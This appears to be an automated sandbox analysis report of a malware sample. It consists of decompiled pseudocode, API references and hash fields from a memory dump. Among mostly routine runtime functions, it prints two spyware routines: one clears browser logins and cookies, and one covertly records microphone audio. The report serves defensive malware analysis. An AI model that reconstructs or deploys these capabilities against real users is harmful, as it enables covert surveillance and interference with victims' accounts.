0x0077eabe
0x0077eace
0x0077eadc
0x0077eae1
0x0077eae8
0x0077eaea
0x00000000
0x0077eaf0
0x0077eaf6
0x0077eafc
0x0077eb03
0x0077eb09
0x0077eb0c
0x0077eb12
0x0077eb1f
0x0077eb26
0x0077eb2b
0x0077eb2e
0x0077eb30
0x0077ed89
0x0077ed8f
0x0077ed90
0x0077ed91
0x0077ed92
0x0077ed93
0x0077ed94
0x0077ed99
0x0077ed9a
0x0077ed9f
0x0077eb36
0x0077eb36
0x0077eb44
0x0077eb47
0x0077eb62
0x0077eb69
0x0077eb6f
0x0077eb75
0x0077eb49
0x0077eb49
0x0077eb51
0x00000000
0x0077eb53
0x0077eb53
0x0077eb59
0x0077eb59
0x0077eb51
0x0077eb7c
0x0077eb7f
0x0077ec9c
0x0077ec9f
0x0077ecac
0x0077ecaf
0x0077ecb7
0x0077ecb7
0x0077eca1
0x0077eca7
0x0077eca7
0x0077eb85
0x0077eb85
0x0077eb8b
0x0077eb93
0x0077eb95
0x0077eb98
0x0077eba1
0x0077ebaa
0x0077ebb0
0x0077ebb0
0x0077ebb3
0x0077ebb5
0x00000000
0x00000000
0x0077ebb7
0x0077ebbd
0x0077ebbe
0x0077ebc9
0x0077ebd1
0x0077ebd9
0x0077ebdc
0x0077ebdf
0x0077ebe5
0x0077ebeb
0x0077ebf1
0x0077ebf7
0x0077ebfa
0x00000000
0x00000000
0x0077ebfc
0x0077ec21
0x0077ec21
0x0077ec24
0x0077ec28
0x0077ec41
0x0077ec46
0x0077ec49
0x0077ec4b
0x0077ec51
0x0077ec8c
0x0077ec53
0x0077ec53
0x0077ec58
0x0077ec60
0x0077ec61
0x0077ec61
0x0077ec78
0x0077ec7f
0x0077ec82
0x0077ec87
0x0077ec87
0x0077ec8f
0x0077ec92
0x0077ec92
0x0077ec97
0x00000000
0x0077ec97
0x0077ebfe
0x0077ec00
0x0077ec05
0x0077ec0b
0x0077ec14
0x0077ec1d
0x0077ec1d
0x00000000
0x0077ec00
0x0077ecba
0x0077ecba
0x0077ecbe
0x0077ecc6
0x0077eccc
0x0077eccf
0x0077ecd5
0x0077ecd7
0x0077ed17
0x0077ed1d
0x0077ed24
0x0077ed24
0x0077ed2a
0x0077ed2e
0x00000000
0x0077ed30
0x0077ed30
0x0077ed34
0x0077ed39
0x0077ed3d
0x0077ed42
0x0077ed49
0x0077ed57
0x0077ed5d
0x0077ed60
0x0077ed60
0x0077ed2e
0x0077ed6f
0x0077ed77
0x0077ed80
0x0077ecd9
0x0077ecdf
0x0077ece2
0x0077ece9
0x0077ecfb
0x0077ed02
0x0077ed0f
0x00000000
0x0077ed0f
0x00000000
0x0077ecd7
0x0077eb30
0x0077eaab
0x00000000
0x0077eaab
0x00000000
0x0077eaa9
0x0077eaa2
0x0077eaa4
0x0077eaa4
0x00000000
0x0077ea2e
0x0077ea2e
0x0077ea2e
0x0077ea30
0x0077ea35
0x0077ea40
0x0077ea40
0x0077e857
0x0077e857
0x0077e85a
0x0077e85f
0x0077e9bc
0x00000000
0x0077e865
0x0077e867
0x0077e86f
0x0077e875
0x0077e876
0x0077e87c
0x0077e87d
0x0077e882
0x0077e885
0x0077e887
0x0077e88d
0x0077e88f
0x0077e890
0x0077e890
0x0077e89e
0x0077e89e
0x0077e8a1
0x0077e8a3
0x0077e8a6
0x0077e8b4
0x0077e8b4
0x0077e99e
0x0077e99e
0x00000000
0x0077e9a0
0x0077e9a0
0x00000000
0x0077e8a8
0x0077e8a8
0x0077e8ab
0x0077e8ae
0x00000000
0x00000000
0x00000000
0x00000000
0x0077e8ae
0x0077e8a6
0x0077e85f
0x0077e851
0x0077e824
0x0077e826
0x0077e827
0x0077e82a
0x00000000
0x00000000
0x00000000
0x00000000
0x0077e82a
0x0077e822
0x0077e7aa
0x00000000
0x0077e79e
0x00000000
0x0077e8bb
0x0077e771
0x0077e766
0x0077e75b
0x0077e714
0x0077e714
0x0077e716
0x0077e718
0x0077e719
0x0077e71a
0x0077e71b
0x0077e720
0x0077e9ab
0x0077e9b0
0x0077e9bb
0x0077e9bb
0x0077e712
0x00000000

APIs

Part of subcall function 0077F98C: HeapAlloc.KERNEL32(00000000,?,?,?,0076F244,?,?,00741696,?,?,?,?,?), ref: 0077F9BE

_free.LIBCMT ref: 0077E65B
_free.LIBCMT ref: 0077E672
_free.LIBCMT ref: 0077E691
_free.LIBCMT ref: 0077E6AC
_free.LIBCMT ref: 0077E6C3

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _free$AllocHeap
String ID:
API String ID: 1835388192-0
Opcode ID: 0dc7461e461bceb360ac69ae88e1d2444ac7583112a8f6d3d9a1a1c9e2a084ce
Instruction ID: cad71c5cb9a1dc9e91e5e890fec84bf2ce1ac83f1b04efac3c9d1b1dd049e867
Opcode Fuzzy Hash: 0dc7461e461bceb360ac69ae88e1d2444ac7583112a8f6d3d9a1a1c9e2a084ce
Instruction Fuzzy Hash: AF51B171A40708EFDF24DF29DC41A6A77F4EF58760B1485A9E90DDB250E739E911CB80

Uniqueness

Uniqueness Score: -1.00%

Function 0077D66D, Relevance: 7.6, APIs: 5, Instructions: 129
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0077D66D(signed int* __ecx, signed int __edx) {
				signed int _v8;
				intOrPtr* _v12;
				signed int _v16;
				signed int _t28;
				signed int _t29;
				intOrPtr _t33;
				signed int _t37;
				signed int _t38;
				signed int _t40;
				void* _t50;
				signed int _t56;
				intOrPtr* _t57;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t78;
				signed int _t80;
				signed int* _t81;
				signed int _t85;
				void* _t86;

				_t72 = __edx;
				_v12 = __ecx;
				_t28 =  *__ecx;
				_t81 =  *_t28;
				if(_t81 != 0) {
					_t29 =  *0x7aa00c; // 0x67a7e35e
					_t56 =  *_t81 ^ _t29;
					_t78 = _t81[1] ^ _t29;
					_t83 = _t81[2] ^ _t29;
					asm("ror edi, cl");
					asm("ror esi, cl");
					asm("ror ebx, cl");
					if(_t78 != _t83) {
						L14:
						 *_t78 = E0077D52E( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
						_t33 = E0076F09C(_t56);
						_t57 = _v12;
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = E0076F09C(_t78 + 4);
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = E0076F09C(_t83);
						_t37 = 0;
						L15:
						return _t37;
					}
					_t38 = 0x200;
					_t85 = _t83 - _t56 >> 2;
					if(_t85 <= 0x200) {
						_t38 = _t85;
					}
					_t80 = _t38 + _t85;
					if(_t80 == 0) {
						_t80 = 0x20;
					}
					if(_t80 < _t85) {
						L9:
						_push(4);
						_t80 = _t85 + 4;
						_push(_t80);
						_v8 = E00787D55(_t56);
						_t40 = E007801F5(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							goto L11;
						}
						_t37 = _t40 | 0xffffffff;
						goto L15;
					} else {
						_push(4);
						_push(_t80);
						_v8 = E00787D55(_t56);
						E007801F5(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							L11:
							_t56 = _t68;
							_v8 = _t68 + _t85 * 4;
							_t83 = _t68 + _t80 * 4;
							_t78 = _v8;
							_push(0x20);
							asm("ror eax, cl");
							_t71 = _t78;
							_v16 = 0 ^  *0x7aa00c;
							asm("sbb edx, edx");
							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
							_v8 = _t74;
							if(_t74 == 0) {
								goto L14;
							}
							_t75 = _v16;
							_t50 = 0;
							do {
								_t50 = _t50 + 1;
								 *_t71 = _t75;
								_t71 = _t71 + 4;
							} while (_t50 != _v8);
							goto L14;
						}
						goto L9;
					}
				}
				return _t28 | 0xffffffff;
			}

0x0077d66d
0x0077d677
0x0077d67b
0x0077d67d
0x0077d681
0x0077d68b
0x0077d69c
0x0077d6a1
0x0077d6a3
0x0077d6a5
0x0077d6a7
0x0077d6a9
0x0077d6ad
0x0077d767
0x0077d775
0x0077d777
0x0077d77c
0x0077d783
0x0077d793
0x0077d7a2
0x0077d7a5
0x0077d7a7
0x00000000
0x0077d7a8
0x0077d6b5
0x0077d6ba
0x0077d6bf
0x0077d6c1
0x0077d6c1
0x0077d6c3
0x0077d6c8
0x0077d6cc
0x0077d6cc
0x0077d6cf
0x0077d6ee
0x0077d6ee
0x0077d6f0
0x0077d6f3
0x0077d6fc
0x0077d6ff
0x0077d704
0x0077d707
0x0077d70c
0x00000000
0x00000000
0x0077d70e
0x00000000
0x0077d6d1
0x0077d6d1
0x0077d6d3
0x0077d6dc
0x0077d6df
0x0077d6e4
0x0077d6e7
0x0077d6ec
0x0077d716
0x0077d719
0x0077d71b
0x0077d71e
0x0077d726
0x0077d72c
0x0077d733
0x0077d735
0x0077d73d
0x0077d74c
0x0077d750
0x0077d752
0x0077d755
0x00000000
0x00000000
0x0077d757
0x0077d75a
0x0077d75c
0x0077d75c
0x0077d75d
0x0077d75f
0x0077d762
0x00000000
0x0077d75c
0x00000000
0x0077d6ec
0x0077d6cf
0x00000000

APIs

_free.LIBCMT ref: 0077D6DF
_free.LIBCMT ref: 0077D6FF

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 1a2cb0b3967efaec57723bcd1f7b318fe4e0529cc027e7093f8165b63ee9503a
Instruction ID: 457bc4e064981b6969c50e0327a104e49a474ef0b177992f365f264e2313146a
Opcode Fuzzy Hash: 1a2cb0b3967efaec57723bcd1f7b318fe4e0529cc027e7093f8165b63ee9503a
Instruction Fuzzy Hash: B441D236E00204DFCB24DF78C885A5EB7B5EF89354B1585A9EA19EB251EB35AD01CB80

Uniqueness

Uniqueness Score: -1.00%

Function 007893AC, Relevance: 7.6, APIs: 5, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E007893AC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				signed int _t34;
				signed int _t40;
				int _t46;
				int _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t69;
				signed int _t70;
				short* _t71;

				_t34 =  *0x7aa00c; // 0x67a7e35e
				_v8 = _t34 ^ _t70;
				E00775507(__ebx,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t53 =  *(_v24 + 8);
					_t57 = _t53;
					_a24 = _t53;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					return E0076FD1B(_v8 ^ _t70);
				}
				_t55 = _t40 + _t40;
				asm("sbb eax, eax");
				if((_t55 + 0x00000008 & _t40) == 0) {
					_t69 = 0;
					L11:
					if(_t69 != 0) {
						E00771F00(_t67, _t69, _t67, _t55);
						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t69, _v12);
						if(_t46 != 0) {
							_t67 = GetStringTypeW(_a8, _t69, _t46, _a20);
						}
					}
					L14:
					E00770BA0(_t69);
					goto L15;
				}
				asm("sbb eax, eax");
				_t48 = _t40 & _t55 + 0x00000008;
				_t63 = _t55 + 8;
				if((_t40 & _t55 + 0x00000008) > 0x400) {
					asm("sbb eax, eax");
					_t69 = E0077F98C(_t63, _t48 & _t63);
					if(_t69 == 0) {
						goto L14;
					}
					 *_t69 = 0xdddd;
					L9:
					_t69 =  &(_t69[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E00790810();
				_t69 = _t71;
				if(_t69 == 0) {
					goto L14;
				}
				 *_t69 = 0xcccc;
				goto L9;
			}

0x007893b4
0x007893bb
0x007893c7
0x007893cc
0x007893d1
0x007893d6
0x007893d9
0x007893db
0x007893db
0x007893e0
0x007893f9
0x007893ff
0x00789404
0x007894a3
0x007894a7
0x007894ac
0x007894ac
0x007894c8
0x007894c8
0x0078940a
0x00789412
0x00789416
0x00789462
0x00789464
0x00789466
0x0078946b
0x00789482
0x0078948a
0x0078949a
0x0078949a
0x0078948a
0x0078949c
0x0078949d
0x00000000
0x007894a2
0x0078941d
0x0078941f
0x00789421
0x00789429
0x00789446
0x00789450
0x00789455
0x00000000
0x00000000
0x00789457
0x0078945d
0x0078945d
0x00000000
0x0078945d
0x0078942d
0x00789431
0x00789436
0x0078943a
0x00000000
0x00000000
0x0078943c
0x00000000

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00768E1A,?,?,?,00000001,?,?,00000001,00768E1A,00768E1A), ref: 007893F9
__alloca_probe_16.LIBCMT ref: 00789431
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00768E1A,?,?,?,00000001,?,?,00000001,00768E1A,00768E1A,?), ref: 00789482
GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,?,?,00000001,00768E1A,00768E1A,?,00000002,?), ref: 00789494
__freea.LIBCMT ref: 0078949D

Part of subcall function 0077F98C: HeapAlloc.KERNEL32(00000000,?,?,?,0076F244,?,?,00741696,?,?,?,?,?), ref: 0077F9BE

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocHeapStringType__alloca_probe_16__freea
String ID:
API String ID: 1857427562-0
Opcode ID: ae5fc3ed2cfb1e71c6a9169aa949f07bcbbf87df63d74ee183eb6cc91e86810b
Instruction ID: 5b67ca9cba664c842b196f2b42b87eb98692b8b0164f9d24d081880c0876a050
Opcode Fuzzy Hash: ae5fc3ed2cfb1e71c6a9169aa949f07bcbbf87df63d74ee183eb6cc91e86810b
Instruction Fuzzy Hash: 6A31CE72A0024AABDF25AF64DC45EBF7BA5EB40310F088129FD08D7291E739DD52CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0074A523, Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 103
sleepCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E0074A523(void* __edi) {
				char _v5;
				char _v6;
				char _v7;
				void* __ebx;
				void* __ecx;
				void* __ebp;
				intOrPtr _t18;
				void* _t36;
				intOrPtr _t40;
				char _t50;
				void* _t52;
				signed int _t53;
				signed int _t54;
				void* _t55;

				_t52 = __edi;
				_t54 = _t53 & 0xfffffff8;
				 *0x7abaf9 = 1;
				Sleep( *0x7abaf4);
				_v7 = 0;
				_t36 = 0;
				_v6 = 0;
				_v5 = 0;
				goto L1;
				do {
					do {
						L1:
						_t59 = _t36;
						if(_t36 == 0) {
							L2:
							_t36 = E0074A409(_t59);
						}
						_t60 = _t36;
						if(_t36 == 0) {
							_t36 = E0074A22D(_t52, _t60);
						}
						_t61 = _v6;
						if(_v6 == 0) {
							_v6 = E0074A012(_t36, _t52, _t61);
						}
						_t62 = _v7;
						if(_v7 == 0) {
							_v7 = E00749F83(_t52, _t62);
						}
						_t50 = _v5;
						_t63 = _t50;
						if(_t50 == 0) {
							_t50 = E00749EF4(_t52, _t63);
							_v5 = _t50;
						}
						if(_t36 == 0 || _t36 == 0) {
							L16:
							Sleep(0x1388);
							_t18 = _v7;
							_t40 = _v6;
							_t50 = _v5;
						} else {
							_t18 = _v7;
							if(_t18 == 0 || _t50 == 0) {
								goto L16;
							} else {
								_t40 = _v6;
								if(_t40 == 0) {
									goto L16;
								}
							}
						}
						if(_t36 == 0) {
							goto L2;
						}
					} while (_t36 == 0 || _t18 == 0 || _t50 == 0);
					_t73 = _t40;
				} while (_t40 == 0);
				_t55 = _t54 - 0x18;
				E00742084(_t36, _t55, "\n[Cleared browsers logins and cookies.]\n");
				E0074A6EF(_t36, _t50, _t73);
				E00742084(_t36, _t55, "Cleared browsers logins and cookies.");
				_t56 = _t55 - 0x18;
				E00742084(_t36, _t55 - 0x18, "[Info]");
				E00756C80(_t36, _t52);
				E00742084(_t36, _t56 + 0x18, 0x79f6bc);
				_push(0xaf);
				E00744AA4(_t36, 0x7ac780, _t50, _t73);
				if( *0x7abaf8 != 0) {
					E00750BB0(0x7ac518, E00741F95(0x7ac518), "FR", 1);
				}
				 *0x7abaf9 = 0;
				return 0;
			}

0x0074a523
0x0074a526
0x0074a531
0x0074a538
0x0074a544
0x0074a548
0x0074a54a
0x0074a550
0x0074a550
0x0074a554
0x0074a554
0x0074a554
0x0074a554
0x0074a556
0x0074a558
0x0074a55d
0x0074a55d
0x0074a55f
0x0074a561
0x0074a568
0x0074a568
0x0074a56e
0x0074a570
0x0074a577
0x0074a577
0x0074a57f
0x0074a581
0x0074a588
0x0074a588
0x0074a58c
0x0074a590
0x0074a592
0x0074a599
0x0074a59b
0x0074a59b
0x0074a5a1
0x0074a5bb
0x0074a5c0
0x0074a5c6
0x0074a5ca
0x0074a5ce
0x0074a5a7
0x0074a5a7
0x0074a5ad
0x00000000
0x0074a5b3
0x0074a5b3
0x0074a5b9
0x00000000
0x00000000
0x0074a5b9
0x0074a5ad
0x0074a5d4
0x00000000
0x00000000
0x0074a5d6
0x0074a5ee
0x0074a5ee
0x0074a5f6
0x0074a600
0x0074a605
0x0074a611
0x0074a616
0x0074a620
0x0074a625
0x0074a634
0x0074a639
0x0074a643
0x0074a64f
0x0074a664
0x0074a66a
0x0074a66b
0x0074a678

APIs

Sleep.KERNEL32 ref: 0074A538
Sleep.KERNEL32(00001388), ref: 0074A5C0

Strings

[Info], xrefs: 0074A61B
[Cleared browsers logins and cookies.], xrefs: 0074A5FB
Cleared browsers logins and cookies., xrefs: 0074A60C

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Sleep
String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.$[Info]
API String ID: 3472027048-899236412
Opcode ID: 6e3f83653613e1c1480df3d406e30eaf9cd923a504749593aa433d704fb9e149
Instruction ID: eb28510bee8cd2a7ce770eb1e0d33009ecb00270379efafc1936840f07e6d130
Opcode Fuzzy Hash: 6e3f83653613e1c1480df3d406e30eaf9cd923a504749593aa433d704fb9e149
Instruction Fuzzy Hash: 3931D50128C381BECB1167B8251A7EABF920FA3750F498459F8D44B393DB9E482D9363

Uniqueness

Uniqueness Score: -1.00%

Function 00741BCD, Relevance: 7.6, APIs: 5, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00741BCD(void* __eflags) {
				signed short _t3;
				signed int _t7;
				signed int _t15;
				signed int _t24;
				signed int _t25;
				intOrPtr* _t33;
				void* _t34;

				_t34 = __eflags;
				CreateDirectoryW(E00741EEB(0x7ac0e0), 0);
				_t3 = 8;
				 *0x7abaa6 = _t3;
				 *0x7aba9c = 0x1f40;
				 *0x7abaa0 = 0x1f40;
				0x7aba98->wFormatTag = 1;
				 *0x7aba9a = 1;
				 *0x7abaa4 = 1;
				 *0x7abaa8 = 0;
				_t7 = E00776769(_t5, E00741F95(E00741E49(0x7ac578, 1, _t34, 0x24)));
				_t24 =  *0x7aba9c; // 0x0
				 *_t33 = 0x30008;
				_t25 = _t24 * _t7 * 0x3c;
				 *0x7abaac = _t25;
				 *0x7abab4 = (( *0x7abaa6 & 0x0000ffff) >> 3) * _t25;
				waveInOpen(0x7abab0, 0xffffffff, 0x7aba98, E00741CEF, 0, ??);
				E00741F84( *0x7abab4);
				0x7aba78->lpData = E00741F95(0x7ac0f8);
				_t15 =  *0x7abab4; // 0x0
				 *0x7aba7c = _t15;
				 *0x7aba80 = 0;
				 *0x7aba84 = 0;
				 *0x7aba88 = 0;
				 *0x7aba8c = 0;
				waveInPrepareHeader( *0x7abab0, 0x7aba78, 0x20);
				waveInAddBuffer( *0x7abab0, 0x7aba78, 0x20);
				waveInStart( *0x7abab0);
				return 0;
			}

0x00741bcd
0x00741bdd
0x00741be5
0x00741beb
0x00741bf3
0x00741bfa
0x00741c02
0x00741c10
0x00741c17
0x00741c1e
0x00741c31
0x00741c36
0x00741c3f
0x00741c51
0x00741c68
0x00741c6e
0x00741c73
0x00741c86
0x00741c99
0x00741c9e
0x00741caa
0x00741caf
0x00741cb5
0x00741cbb
0x00741cc1
0x00741cc7
0x00741cd6
0x00741ce2
0x00741cec

APIs

CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00741BDD
waveInOpen.WINMM(007ABAB0,000000FF,007ABA98,Function_00001CEF,00000000,00000000,00000024), ref: 00741C73
waveInPrepareHeader.WINMM(007ABA78,00000020), ref: 00741CC7
waveInAddBuffer.WINMM(007ABA78,00000020), ref: 00741CD6
waveInStart.WINMM ref: 00741CE2

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
String ID:
API String ID: 1356121797-0
Opcode ID: 8aa343251d2cba84caf522ec9bd59d05114db0483b826cacf320ce2b976c7abc
Instruction ID: 2eaff7b156aa8343d43591ca3349182cdb2d6d3c5ca9a27c6b7c29ab184335c6
Opcode Fuzzy Hash: 8aa343251d2cba84caf522ec9bd59d05114db0483b826cacf320ce2b976c7abc
Instruction Fuzzy Hash: BD214A71A54200EBC714AF76AC0A92A7AA5EBC7311B40C12EF109D7AB2EB3C48419B5C

Uniqueness

Uniqueness Score: -1.00%

Function 007875DA, Relevance: 7.6, APIs: 5, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E007875DA() {
				int _v8;
				void* __ecx;
				void* _t6;
				int _t7;
				char* _t13;
				int _t17;
				void* _t19;
				char* _t25;
				WCHAR* _t27;

				_t27 = GetEnvironmentStringsW();
				if(_t27 == 0) {
					L7:
					_t13 = 0;
				} else {
					_t6 = E007875A3(_t27);
					_pop(_t19);
					_t17 = _t6 - _t27 >> 1;
					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
					_v8 = _t7;
					if(_t7 == 0) {
						goto L7;
					} else {
						_t25 = E0077F98C(_t19, _t7);
						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
							_t13 = 0;
						} else {
							_t13 = _t25;
							_t25 = 0;
						}
						E007801F5(_t25);
					}
				}
				if(_t27 != 0) {
					FreeEnvironmentStringsW(_t27);
				}
				return _t13;
			}

0x007875e9
0x007875ef
0x00787647
0x00787647
0x007875f1
0x007875f2
0x007875f7
0x00787600
0x00787606
0x0078760c
0x00787611
0x00000000
0x00787613
0x00787619
0x0078761e
0x0078763c
0x00787636
0x00787636
0x00787638
0x00787638
0x0078763f
0x00787644
0x00787611
0x0078764b
0x0078764e
0x0078764e
0x0078765c

APIs

GetEnvironmentStringsW.KERNEL32 ref: 007875E3
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00787606

Part of subcall function 0077F98C: HeapAlloc.KERNEL32(00000000,?,?,?,0076F244,?,?,00741696,?,?,?,?,?), ref: 0077F9BE

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0078762C
_free.LIBCMT ref: 0078763F
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0078764E

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
String ID:
API String ID: 2278895681-0
Opcode ID: cdf278c4333aadd078ce64be8a522be67adf1e6bb7142139278ad38d207e3ed0
Instruction ID: 6864e5fc4520dcdc9b1535ae1ad90ee6f6e0b85e2af0dc87fced88251d1af807
Opcode Fuzzy Hash: cdf278c4333aadd078ce64be8a522be67adf1e6bb7142139278ad38d207e3ed0
Instruction Fuzzy Hash: 1601D4B2745A15BF272526AA5C8CC7B6A6DDEC2BA0324012AF905C3250EE69CD02C3B4

Uniqueness

Uniqueness Score: -1.00%

Function 00781D66, Relevance: 7.6, APIs: 5, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00781D66(void* __ecx) {
				void* __esi;
				intOrPtr _t2;
				void* _t4;
				void* _t10;
				void* _t11;
				void* _t13;
				void* _t15;
				long _t16;

				_t11 = __ecx;
				_t16 = GetLastError();
				_t10 = 0;
				_t2 =  *0x7aa1e0; // 0x6
				_t19 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t15 = E0077F348(_t11, 1, 0x364);
					_pop(_t13);
					if(_t15 != 0) {
						_t4 = E007822DF(_t13, _t16, __eflags,  *0x7aa1e0, _t15);
						__eflags = _t4;
						if(_t4 != 0) {
							E00781B54(_t13, _t15, 0x7ab654);
							E007801F5(_t10);
							__eflags = _t15;
							if(_t15 != 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t15);
							goto L4;
						}
					} else {
						_push(_t10);
						L4:
						E007801F5();
						L8:
						SetLastError(_t16);
					}
				} else {
					_t15 = E00782289(_t11, _t16, _t19, _t2);
					if(_t15 != 0) {
						L9:
						SetLastError(_t16);
						_t10 = _t15;
					} else {
						goto L2;
					}
				}
				return _t10;
			}

0x00781d66
0x00781d71
0x00781d73
0x00781d75
0x00781d7a
0x00781d7d
0x00781d8b
0x00781d97
0x00781d9a
0x00781d9d
0x00781daf
0x00781db4
0x00781db6
0x00781dc1
0x00781dc7
0x00781dcf
0x00781dd1
0x00000000
0x00000000
0x00000000
0x00000000
0x00781db8
0x00781db8
0x00000000
0x00781db8
0x00781d9f
0x00781d9f
0x00781da0
0x00781da0
0x00781dd3
0x00781dd4
0x00781dd4
0x00781d7f
0x00781d85
0x00781d89
0x00781ddc
0x00781ddd
0x00781de3
0x00000000
0x00000000
0x00000000
0x00781d89
0x00781dea

APIs

GetLastError.KERNEL32(?,?,?,0077A509,0077F9CF,?,?,0076F244,?,?,00741696,?,?,?,?,?), ref: 00781D6B
_free.LIBCMT ref: 00781DA0
_free.LIBCMT ref: 00781DC7
SetLastError.KERNEL32(00000000), ref: 00781DD4
SetLastError.KERNEL32(00000000), ref: 00781DDD

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: e3fd760a31bf640e72b971abefff5a789b8c0f2e58ecde76b7a096086a9586e0
Instruction ID: a4b0725efe5b808ee9cd06808ab731f2b280ede230feff12f4f0148227241db1
Opcode Fuzzy Hash: e3fd760a31bf640e72b971abefff5a789b8c0f2e58ecde76b7a096086a9586e0
Instruction Fuzzy Hash: ED01D1763C0601BB92127365AC4DE2B163DABD23B27614129F90592292EF2C89074374

Uniqueness

Uniqueness Score: -1.00%

Function 00788C3C, Relevance: 7.5, APIs: 5, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00788C3C(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x7aa188; // 0x7aa180
					if(_t23 != 0) {
						E007801F5(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x7aa18c; // 0x7ab64c
					if(_t24 != 0) {
						E007801F5(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x7aa190; // 0x7ab64c
					if(_t25 != 0) {
						E007801F5(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x7aa1b8; // 0x7aa184
					if(_t26 != 0) {
						E007801F5(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x7aa1bc; // 0x7ab650
					if(_t27 != 0) {
						return E007801F5(_t6);
					}
				}
				return _t6;
			}

0x00788c42
0x00788c47
0x00788c4b
0x00788c51
0x00788c54
0x00788c59
0x00788c5d
0x00788c63
0x00788c66
0x00788c6b
0x00788c6f
0x00788c75
0x00788c78
0x00788c7d
0x00788c81
0x00788c87
0x00788c8a
0x00788c8f
0x00788c90
0x00788c93
0x00788c99
0x00000000
0x00788ca1
0x00788c99
0x00788ca4

APIs

_free.LIBCMT ref: 00788C54

Part of subcall function 007801F5: HeapFree.KERNEL32(00000000,00000000,?,00788EEF,?,00000000,?,00000000,?,00789193,?,00000007,?,?,007896DE,?), ref: 0078020B
